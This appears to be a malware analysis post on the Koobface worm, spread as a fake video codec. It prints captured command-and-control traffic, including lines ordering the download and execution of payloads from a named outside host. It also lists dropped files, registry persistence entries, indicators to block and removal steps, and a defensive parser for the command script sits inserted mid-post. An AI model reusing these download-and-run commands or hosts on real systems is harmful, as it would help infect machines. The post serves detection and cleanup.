Worm.Win32.Koobface
A user sent us another fake video codec, downloaded from a fake movie website that used bogus Flash movies to push the visitor into downloading the "codec".
Once executed, the program generates the following Internet traffic:
    POST /achcheck.php HTTP/1.1
    Host: nua06032009.biz

    POST /ld/gen.php HTTP/1.1
    Host: nua06032009.biz

    #PID=8000
    STARTONCE|hxxp://stanishev.com/1/pch4.exe
    START|hxxp://stanishev.com/1/nfr.exe
    STARTONCE|hxxp://stanishev.com/1/pp.06.exe
    WAIT|120
    #BLACKLABEL
    EXIT
In the above traffic the malware is instructed to download and install three new, different malware samples on the victim's computer. These are the files created on the system after the three URLs have been downloaded:
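The response to /ld/gen.php is a small line-oriented command script. The parser below is an added example (not code from the original post) that extracts the indicators a defender needs from such a capture; the verb meanings it assumes (START/STARTONCE fetch a payload, WAIT pauses for a number of seconds, EXIT ends the script) are inferred from the post's description, and nothing is downloaded or executed.

```python
# Parse the loader command script returned by /ld/gen.php (added example, not
# the post's own code). Verb meanings are inferred from the post's description;
# nothing is downloaded or run here, only indicators are extracted for blocking.
from dataclasses import dataclass, field
from urllib.parse import urlparse

# The captured response from the post, URLs defanged with hxxp as published.
CAPTURED_RESPONSE = """#PID=8000
STARTONCE|hxxp://stanishev.com/1/pch4.exe
START|hxxp://stanishev.com/1/nfr.exe
STARTONCE|hxxp://stanishev.com/1/pp.06.exe
WAIT|120
#BLACKLABEL
EXIT
"""
PAYLOAD_VERBS = {"START", "STARTONCE"}

@dataclass
class CommandScript:
    directives: list = field(default_factory=list)   # '#...' marker lines, kept raw
    payload_urls: list = field(default_factory=list) # URLs the bot is told to fetch
    total_wait: int = 0                              # seconds of WAIT in total
    unknown: list = field(default_factory=list)      # lines with verbs not known here
    exited: bool = False                             # an EXIT was reached

def parse_command_script(text: str) -> CommandScript:
    """Turn raw 'VERB|ARG' lines into structured indicators; stops at EXIT."""
    result = CommandScript()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            result.directives.append(line)
            continue
        verb, _, arg = line.partition("|")
        verb, arg = verb.strip().upper(), arg.strip()
        if verb in PAYLOAD_VERBS:
            result.payload_urls.append(arg)
        elif verb == "WAIT":
            result.total_wait += int(arg) if arg.isdigit() else 0
        elif verb == "EXIT":
            result.exited = True
            break
        else:
            result.unknown.append(line)
    return result

def blocklist_hosts(script: CommandScript) -> set:
    """Distinct hosts to block; hxxp is undone only so urlparse sees a scheme."""
    return {urlparse(u.replace("hxxp", "http", 1)).hostname for u in script.payload_urls}
```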
    C:\WINDOWS\ld08.exe
    C:\353454543.bat
    %User%\LOCALS~1\Temp\jopaxx_xx40040395.exe
    C:\WINDOWS\st_xx40038948.exe
    C:\dll32.bat
    %User%\LOCALS~1\Temp\jopaxx_1240028657.exe
    C:\WINDOWS\system32\dll32.exe
    C:\WINDOWS\9g2234wesdf3dfgjf23
    C:\WINDOWS\pp06.exe
    C:\355674543.bat
Note that a new .bat file was dropped in C:\ and then executed by the malware, after which these files were deleted:
    %User%\LOCALS~1\Temp\JOPAXX~2.EXE
    C:\355674~1.BAT
    C:\WINDOWS\ST_124~1.EXE
    C:\dll32.bat
Running processes:
The program generates the following Internet traffic:
    GET /v50/search.php?p=10005&s=I&v=57&uid=-XXXXXXXXX&q= HTTP/1.1
    User-Agent:
    Host: 85.13.236.154
    Referer:
Symptoms that can be noticed in a HijackThis log:
    c:\windows\ld08.exe
    %User%\LOCALS~1\Temp\jopaxx_1240040395.exe
    c:\windows\pp06.exe
    C:\WINDOWS\System32\dll32.exe
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=localhost:7171
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local>
    O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe
    O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe
    O4 - HKCU\..\Run: [dll32] dll32
How to remove this malware?
1) Kill all the malicious running processes and remove their files, in this case:
    ld08.exe
    pp06.exe
    dll32.exe
    jopaxx_1240040395.exe
2) Delete the malicious registry entries, in this case:
    O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe
    O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe
    O4 - HKCU\..\Run: [dll32] dll32
3) Block the malicious IPs and domains, in this case:
    nua06032009.biz
    stanishev.com
    85.13.236.154 (85.13.236.154.reverse.coreix.net)
4) Update your antivirus and run a full system scan.
5) Scan your system with NoVirusThanks Malware Remover.